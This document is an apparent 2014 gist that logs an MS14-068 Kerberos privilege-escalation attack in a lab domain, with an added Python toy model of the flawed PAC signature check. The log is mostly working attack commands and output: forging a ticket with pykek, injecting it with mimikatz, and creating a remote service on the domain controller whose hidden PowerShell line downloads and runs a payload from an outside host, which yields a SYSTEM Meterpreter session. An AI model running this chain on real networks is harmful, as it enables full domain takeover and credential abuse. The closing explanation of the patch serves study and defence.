Created December 6, 2014 00:05
MS14-068 in action
git clone https://github.com/bidord/pykek
echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts
[*] [2014.12.05-23:43:51] 172.16.80.100 web_delivery - Delivering Payload
[*] [2014.12.05-23:43:53] Sending stage (770048 bytes) to 172.16.80.100
[*] Meterpreter session 12 opened (172.16.80.225:4444 -> 172.16.80.100:57204) at 2014-12-05 23:44:12 +0000
20141205-23:44 - 192.168.153.129 exploit(payload_inject) > sessions -i 12
[*] Starting interaction with 12...
meterpreter > portfwd add -l 88 -p 88 -r 172.16.80.10
[*] Local TCP relay created: 0.0.0.0:88 <-> 172.16.80.10:88
python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
meterpreter > getuid
Server username: METASPLOITABLE\User01
meterpreter > sysinfo
Computer : MSFTS01
OS : Windows 8.1 (Build 9600).
Architecture : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter : x86/win32
meterpreter > shell
Process 4232 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32\WindowsPowerShell\v1.0>whoami /user
whoami /user
USER INFORMATION
----------------
User Name SID
===================== ==============================================
metasploitable\user01 S-1-5-21-2928836948-3642677517-2073454066-1105
C:\Windows\system32\WindowsPowerShell\v1.0>net use \\msfdc01\admin$
net use \\msfdc01\admin$
The password is invalid for \\msfdc01\admin$.
Enter the username for 'msfdc01': System error 1223 has occurred.
The operation was cancelled by the user.
c:\test>exit
meterpreter > cd c:/test
meterpreter > upload /root/TGT_user01@metasploitable.local.ccache c:/test/TGT_user01@metasploitable.local.ccache
[*] uploading : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache
[*] uploaded : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"kerberos::ptc TGT_user01@metasploitable.local.ccache" exit'
Process 3600 created.
Channel 3 created.
meterpreter > shell
Process 3948 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\test>net use \\msfdc01\admin$
net use \\msfdc01\admin$
The password is invalid for \\msfdc01\admin$.
Enter the username for 'msfdc01': System error 1223 has occurred.
The operation was cancelled by the user.
c:\test>klist
klist
'klist' is not recognized as an internal or external command,
operable program or batch file.
c:\test>mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit
mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 20 2014 01:35:45)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 15 modules * * */
mimikatz(commandline) # kerberos::ptc TGT_user01@metasploitable.local.ccache
Principal : (01) : user01 ; @ METASPLOITABLE.LOCAL
Data 0
Start/End/MaxRenew: 05/12/2014 23:42:03 ; 06/12/2014 09:41:58 ; 12/12/2014 23:41:58
Service Name (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL
Target Name (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL
Client Name (01) : user01 ; @ METASPLOITABLE.LOCAL
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 - rc4_hmac_nt
d5c7022a905e9c71deed80c28940a27d
Ticket : 0x00000000 - null ; kvno = 2 [...]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
c:\test>net use \\msfdc01\admin$
net use \\msfdc01\admin$
The command completed successfully.
c:\test>sc \\msfdc01\ create test binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('ht^C
Terminate channel 4? [y/N] n
c:\test>
c:\test>sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))"
sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))"
[SC] CreateService SUCCESS
c:\test>sc \\msfdc01\ start test_ptc
sc \\msfdc01\ start test_ptc
^Z
Background channel 4? [y/N] y
meterpreter >
meterpreter > background
[*] Backgrounding session 12...
20141205-23:49 - 192.168.153.129 exploit(payload_inject) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ MSFDC01 172.16.80.225:4444 -> 172.16.80.10:60843 (172.16.80.10)
12 meterpreter x86/win32 METASPLOITABLE\User01 @ MSFTS01 172.16.80.225:4444 -> 172.16.80.100:57204 (172.16.80.100)
20141205-23:49 - 192.168.153.129 exploit(payload_inject) >
[*] [2014.12.05-23:49:18] 172.16.80.10 web_delivery - Delivering Payload
[*] [2014.12.05-23:49:19] Sending stage (770048 bytes) to 172.16.80.10
[*] Meterpreter session 13 opened (172.16.80.225:4444 -> 172.16.80.10:60961) at 2014-12-05 23:49:35 +0000
20141205-23:50 - 192.168.153.129 exploit(payload_inject) > sessions -i 13
[*] Starting interaction with 13...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDC01
OS : Windows 2008 (Build 6002, Service Pack 2).
Architecture : x86
System Language : en_GB
Meterpreter : x86/win32
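The step that makes the rest of the session above possible is the ms14-068.py run: the DC issued a TGT containing a PAC whose group claims (pykek adds the well-known admin RIDs) were never verified with the krbtgt key, because the unpatched KDC accepted PAC server and KDC signatures made with an unkeyed checksum type (plain MD5, checksum type 7) and only required the value to recompute. The Python below is an added toy model of that validation decision, not code from the gist, from pykek, or from Windows: the PAC body is a constructed byte string rather than real NDR-encoded logon info, only the RC4-HMAC keyed checksum (HMAC-MD5 per RFC 4757) is implemented, the krbtgt key bytes are invented, and the user RID 1105 is simply the last component of the SID shown in the log.

```python
"""Toy model of the PAC signature check that MS14-068 broke (added example).

Assumptions: PAC body is a constructed byte string, not the real NDR
KERB_VALIDATION_INFO; only the RC4-HMAC (HMAC-MD5) keyed checksum is modelled;
the AES checksum types are named but not implemented; the key is invented.
"""
import hashlib
import hmac
import struct
from typing import Dict, List, Optional, Tuple

# Checksum type identifiers (RFC 3961, RFC 4757, MS-PAC section 2.8)
KERB_CHECKSUM_RSA_MD5 = 7                  # unkeyed: anyone can compute it
KERB_CHECKSUM_HMAC_MD5 = -138              # keyed with the RC4-HMAC long-term key
KERB_CHECKSUM_HMAC_SHA1_96_AES128 = 15     # keyed (not implemented here)
KERB_CHECKSUM_HMAC_SHA1_96_AES256 = 16     # keyed (not implemented here)
KERB_NON_KERB_CKSUM_SALT = 17              # key usage number for PAC signatures

KEYED_CHECKSUM_TYPES = {
    KERB_CHECKSUM_HMAC_MD5,
    KERB_CHECKSUM_HMAC_SHA1_96_AES128,
    KERB_CHECKSUM_HMAC_SHA1_96_AES256,
}


def hmac_md5_checksum(key: bytes, data: bytes, usage: int = KERB_NON_KERB_CKSUM_SALT) -> bytes:
    """RFC 4757 section 4 HMAC-MD5 checksum, the keyed PAC signature used with RC4 keys."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    tmp = hashlib.md5(struct.pack("<I", usage) + data).digest()
    return hmac.new(ksign, tmp, hashlib.md5).digest()


def compute_checksum(cksum_type: int, data: bytes, key: Optional[bytes]) -> bytes:
    """Recompute a PAC signature value for the named checksum type."""
    if cksum_type == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()          # no key involved at all
    if cksum_type == KERB_CHECKSUM_HMAC_MD5:
        if key is None:
            raise ValueError("keyed checksum requires a key")
        return hmac_md5_checksum(key, data)
    raise NotImplementedError(f"checksum type {cksum_type} not modelled")


def verify_vulnerable(pac_body: bytes, cksum_type: int, signature: bytes, key: bytes) -> bool:
    """Pre-MS14-068 behaviour: trust whatever checksum type the PAC names, as
    long as the value recomputes. An unkeyed type therefore passes."""
    try:
        expected = compute_checksum(cksum_type, pac_body, key)
    except (NotImplementedError, ValueError):
        return False
    return hmac.compare_digest(expected, signature)


def verify_patched(pac_body: bytes, cksum_type: int, signature: bytes, key: bytes) -> bool:
    """Post-MS14-068 behaviour: reject any checksum type that is not keyed
    before even looking at the value."""
    if cksum_type not in KEYED_CHECKSUM_TYPES:
        return False
    return verify_vulnerable(pac_body, cksum_type, signature, key)


def build_pac_body(user_rid: int, group_rids: List[int]) -> bytes:
    """Constructed stand-in for PAC logon info: user RID followed by group RIDs."""
    return struct.pack("<I", user_rid) + b"".join(struct.pack("<I", r) for r in group_rids)


def forge_pac(user_rid: int) -> Tuple[bytes, int, bytes]:
    """What an attacker can do with no key at all: claim privileged groups and
    'sign' with unkeyed MD5. RIDs 512/518/519/520 are Domain, Schema and
    Enterprise Admins and Group Policy Creator Owners; 513 is Domain Users."""
    body = build_pac_body(user_rid, [513, 512, 518, 519, 520])
    return body, KERB_CHECKSUM_RSA_MD5, compute_checksum(KERB_CHECKSUM_RSA_MD5, body, None)


def demo() -> Dict[str, bool]:
    """Run the forged and a legitimate PAC through both validators."""
    krbtgt_key = hashlib.md5(b"constructed-krbtgt-rc4-key").digest()  # invented key
    body, ctype, sig = forge_pac(user_rid=1105)   # RID from the SID in the log
    legit_body = build_pac_body(1105, [513])
    legit_sig = compute_checksum(KERB_CHECKSUM_HMAC_MD5, legit_body, krbtgt_key)
    tampered_body = legit_body + struct.pack("<I", 512)  # add Domain Admins after signing
    return {
        "forged_accepted_vulnerable": verify_vulnerable(body, ctype, sig, krbtgt_key),
        "forged_accepted_patched": verify_patched(body, ctype, sig, krbtgt_key),
        "legit_accepted_patched": verify_patched(legit_body, KERB_CHECKSUM_HMAC_MD5, legit_sig, krbtgt_key),
        "tampered_accepted_patched": verify_patched(tampered_body, KERB_CHECKSUM_HMAC_MD5, legit_sig, krbtgt_key),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {accepted}")
```

The point the model makes explicit: the fix is not a stronger hash but a refusal to honour attacker-chosen unkeyed checksum types, so the only way to produce a PAC the KDC accepts is to hold the krbtgt key. The tampered case shows the keyed check also catches a group added after signing, which is what the attacker actually wants out of a forged PAC.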